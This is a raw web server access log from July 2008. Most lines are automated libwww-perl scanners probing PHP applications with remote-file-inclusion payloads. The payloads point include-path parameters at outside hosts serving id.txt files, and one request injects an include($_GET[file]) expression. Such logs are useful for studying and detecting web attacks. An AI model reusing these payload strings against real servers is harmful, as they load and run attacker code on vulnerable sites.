92.56.99.197 - - [31/Jul/2008:05:58:56 -0500] "GET //e404.php?DOCUMENT_ROOT=http://keycell.webs/IDscan.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
74.6.18.231 - - [31/Jul/2008:05:59:25 -0500] "GET /logs/access_log.1160870400 HTTP/1.0" 200 175615 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
80.67.26.157 - - [31/Jul/2008:06:00:06 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:06:00:06 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
195.93.201.102 - - [31/Jul/2008:06:00:34 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:06:00:34 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
85.126.175.146 - - [31/Jul/2008:06:04:05 -0500] "GET /logs/access_log.1212883200//modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
85.126.175.146 - - [31/Jul/2008:06:04:05 -0500] "GET //modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
85.126.175.146 - - [31/Jul/2008:06:04:05 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
59.163.101.53 - - [31/Jul/2008:06:04:23 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
59.163.101.53 - - [31/Jul/2008:06:04:29 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
121.219.129.237 - - [31/Jul/2008:06:06:43 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
195.93.201.102 - - [31/Jul/2008:06:07:12 -0500] "GET /logs/access_log.1213142400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:06:07:33 -0500] "GET /logs/access_log.1213315200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
59.163.101.53 - - [31/Jul/2008:06:10:12 -0500] "GET /logs//errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
59.163.101.53 - - [31/Jul/2008:06:10:16 -0500] "GET //errors.php?error=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
80.67.26.157 - - [31/Jul/2008:06:10:37 -0500] "GET /logs/access_log.1214438400//agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:06:10:37 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:06:10:38 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:06:10:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:06:10:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
195.93.201.102 - - [31/Jul/2008:06:11:20 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:06:11:20 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
213.206.113.104 - - [31/Jul/2008:06:12:56 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
213.206.113.104 - - [31/Jul/2008:06:12:56 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.186.1.54 - - [31/Jul/2008:06:13:38 -0500] "GET //?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.800"
89.186.1.54 - - [31/Jul/2008:06:13:39 -0500] "GET /logs//?path%5Bdocroot%5D=http://neu_2.lasrv-1.de/web/.v6/id.txt???? HTTP/1.1" 200 93420 "-""libwww-perl/5.800"
80.67.26.157 - - [31/Jul/2008:06:14:54 -0500] "GET /logs/access_log.1212883200//agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
85.126.175.146 - - [31/Jul/2008:06:17:04 -0500] "GET /logs/access_log.1213315200//modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
195.93.201.102 - - [31/Jul/2008:06:18:31 -0500] "GET /logs/access_log.1214438400//agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:06:18:31 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:06:18:31 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
87.117.238.16 - - [31/Jul/2008:06:18:41 -0500] "GET /logs//citywriter/head.php?path=http://bolikowski.com/images/idi.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
87.117.238.16 - - [31/Jul/2008:06:18:42 -0500] "GET //citywriter/head.php?path=http://bolikowski.com/images/idi.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.810"
208.98.1.100 - - [31/Jul/2008:06:19:32 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
208.98.1.100 - - [31/Jul/2008:06:19:32 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.813"
80.67.26.157 - - [31/Jul/2008:06:19:43 -0500] "GET /logs/access_log.1213142400//agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
212.113.24.150 - - [31/Jul/2008:06:20:52 -0500] "GET /logs//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:20:52 -0500] "GET //skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:21:01 -0500] "GET /logs//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:21:02 -0500] "GET //skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:06:21:26 -0500] "GET /logs/access_log.1212883200//agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
64.81.38.134 - - [31/Jul/2008:06:22:25 -0500] "GET /logs/access_log.1212883200//modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
64.81.38.134 - - [31/Jul/2008:06:22:26 -0500] "GET //modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.803"
64.81.38.134 - - [31/Jul/2008:06:22:26 -0500] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
212.113.24.150 - - [31/Jul/2008:06:27:35 -0500] "GET //skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:06:28:15 -0500] "GET /logs/access_log.1213142400//agendax/addevent.inc.php?agendax_path=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:34 -0500] "GET /logs/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:34 -0500] "GET /!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:35 -0500] "GET /logs/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:36 -0500] "GET /!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:37 -0500] "GET /logs/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:37 -0500] "GET /!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:38 -0500] "GET /logs/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:38 -0500] "GET /!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:39 -0500] "GET /logs/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:40 -0500] "GET /!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:40 -0500] "GET /logs/!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
212.113.24.150 - - [31/Jul/2008:06:31:40 -0500] "GET /!scanhttp://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
208.98.1.100 - - [31/Jul/2008:06:32:50 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.813"
208.98.1.100 - - [31/Jul/2008:06:32:51 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
62.141.56.49 - - [31/Jul/2008:06:32:54 -0500] "GET /logs/access_log.1214438400/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.frico.de/cms/css/images/alba.txt??? HTTP/1.1" 404 346 "-""libwww-perl/5.65"
62.141.56.49 - - [31/Jul/2008:06:32:54 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.frico.de/cms/css/images/alba.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
62.141.56.49 - - [31/Jul/2008:06:32:54 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.frico.de/cms/css/images/alba.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.65"
58.65.228.5 - - [31/Jul/2008:06:37:33 -0500] "GET /logs/?sourcedir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 93415 "-""libwww-perl/5.79"
58.65.228.5 - - [31/Jul/2008:06:37:39 -0500] "GET /?sourcedir=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
74.6.18.231 - - [31/Jul/2008:06:41:12 -0500] "GET /logs/access_log.1201824000 HTTP/1.0" 200 238885 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
212.122.200.198 - - [31/Jul/2008:06:41:25 -0500] "GET /logs////index.php?_SERVER[DOCUMENT_ROOT]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
212.122.200.198 - - [31/Jul/2008:06:41:25 -0500] "GET ////index.php?_SERVER[DOCUMENT_ROOT]=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
208.98.1.100 - - [31/Jul/2008:06:41:27 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.813"
208.98.1.100 - - [31/Jul/2008:06:41:27 -0500] "GET //e404.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.813"
92.61.36.98 - - [31/Jul/2008:06:46:33 -0500] "GET /logs/access_log.1212883200%20%20/?path%5Bdocroot%5D=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 313 "-""libwww-perl/5.65"
59.163.101.53 - - [31/Jul/2008:06:46:42 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
59.163.101.53 - - [31/Jul/2008:06:46:44 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
64.81.38.134 - - [31/Jul/2008:06:47:02 -0500] "GET /logs/access_log.1213315200//modules/My_eGallery/index.php?basepath=http://www.javva.com/id.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.803"
12.196.98.16 - - [31/Jul/2008:06:49:26 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 288 "-""libwww-perl/5.53"
12.196.98.16 - - [31/Jul/2008:06:49:31 -0500] "GET /convert/mvcw.php?vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 288 "-""libwww-perl/5.53"
193.91.27.99 - - [31/Jul/2008:06:50:28 -0500] "GET /logs//modules/vWar_Account/includes/functions_common.php?vwar_root2=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
193.91.27.99 - - [31/Jul/2008:06:50:28 -0500] "GET //modules/vWar_Account/includes/functions_common.php?vwar_root2=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id5.txt???? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
74.53.89.162 - - [31/Jul/2008:06:51:11 -0500] "GET /logs/access_log.1212883200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:06:51:12 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:06:51:12 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
189.102.16.28 - - [31/Jul/2008:06:51:44 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:06:51:44 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.808"
74.53.89.162 - - [31/Jul/2008:06:51:59 -0500] "GET /logs/access_log.1214438400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:06:51:59 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:06:52:00 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.79"
70.84.182.98 - - [31/Jul/2008:06:52:20 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:06:52:20 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:06:52:21 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
70.84.182.98 - - [31/Jul/2008:06:52:21 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
153.19.161.46 - - [31/Jul/2008:06:53:31 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:06:53:31 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:06:53:31 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
153.19.161.46 - - [31/Jul/2008:06:53:31 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.803"
80.67.26.157 - - [31/Jul/2008:06:53:51 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
80.67.26.157 - - [31/Jul/2008:06:53:51 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:06:53:58 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:06:53:58 -0500] "GET //ashnews.php?pathtoashnews=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.808"
74.53.89.162 - - [31/Jul/2008:06:54:27 -0500] "GET /logs/access_log.1212883200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
195.93.201.102 - - [31/Jul/2008:06:55:03 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
195.93.201.102 - - [31/Jul/2008:06:55:03 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
60.250.73.179 - - [31/Jul/2008:06:55:16 -0500] "GET /logs/access_log.1214438400//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 348 "-""libwww-perl/5.805"
60.250.73.179 - - [31/Jul/2008:06:55:17 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
60.250.73.179 - - [31/Jul/2008:06:55:18 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.indigames.com/forum/theme.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
74.53.89.162 - - [31/Jul/2008:06:56:15 -0500] "GET /logs/access_log.1213315200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
74.53.89.162 - - [31/Jul/2008:06:58:10 -0500] "GET /logs/access_log.1213142400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
12.196.98.16 - - [31/Jul/2008:06:58:21 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 293 "-""libwww-perl/5.53"
12.196.98.16 - - [31/Jul/2008:06:58:22 -0500] "GET /convert/mvcw.php?vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 288 "-""libwww-perl/5.53"
210.245.166.92 - - [31/Jul/2008:06:58:32 -0500] "GET /logs//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:06:58:34 -0500] "GET //atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
189.102.16.28 - - [31/Jul/2008:06:58:36 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.808"
189.102.16.28 - - [31/Jul/2008:06:58:37 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.somosnois.com.br/id.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.808"
12.196.98.16 - - [31/Jul/2008:06:58:44 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 293 "-""libwww-perl/5.53"
12.196.98.16 - - [31/Jul/2008:06:58:44 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 288 "-""libwww-perl/5.53"
12.196.98.16 - - [31/Jul/2008:06:58:47 -0500] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 293 "-""libwww-perl/5.53"
12.196.98.16 - - [31/Jul/2008:06:58:47 -0500] "GET /convert/mvcw.php?step=1&vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 288 "-""libwww-perl/5.53"
12.196.98.16 - - [31/Jul/2008:06:58:55 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 293 "-""libwww-perl/5.53"
12.196.98.16 - - [31/Jul/2008:06:58:55 -0500] "GET /convert/mvcw.php?vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 288 "-""libwww-perl/5.53"
209.25.195.86 - - [31/Jul/2008:06:59:08 -0500] "GET /logs/access_log.1212883200//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.811"
209.25.195.86 - - [31/Jul/2008:06:59:08 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
209.25.195.86 - - [31/Jul/2008:06:59:08 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.bglradio.net/WebCalendar/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
208.75.225.10 - - [31/Jul/2008:06:59:53 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://ahoic.com/logo/id4.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.811"
208.75.225.10 - - [31/Jul/2008:06:59:54 -0500] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://ahoic.com/logo/id4.txt? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
208.75.225.10 - - [31/Jul/2008:06:59:54 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ahoic.com/logo/id4.txt? HTTP/1.1" 404 347 "-""libwww-perl/5.811"
210.245.166.92 - - [31/Jul/2008:07:03:07 -0500] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
210.245.166.92 - - [31/Jul/2008:07:03:08 -0500] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
208.98.1.100 - - [31/Jul/2008:07:03:24 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.813"
208.98.1.100 - - [31/Jul/2008:07:03:25 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.813"
12.196.98.16 - - [31/Jul/2008:07:03:39 -0500] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 313 "-""libwww-perl/5.53"
12.196.98.16 - - [31/Jul/2008:07:03:39 -0500] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 308 "-""libwww-perl/5.53"
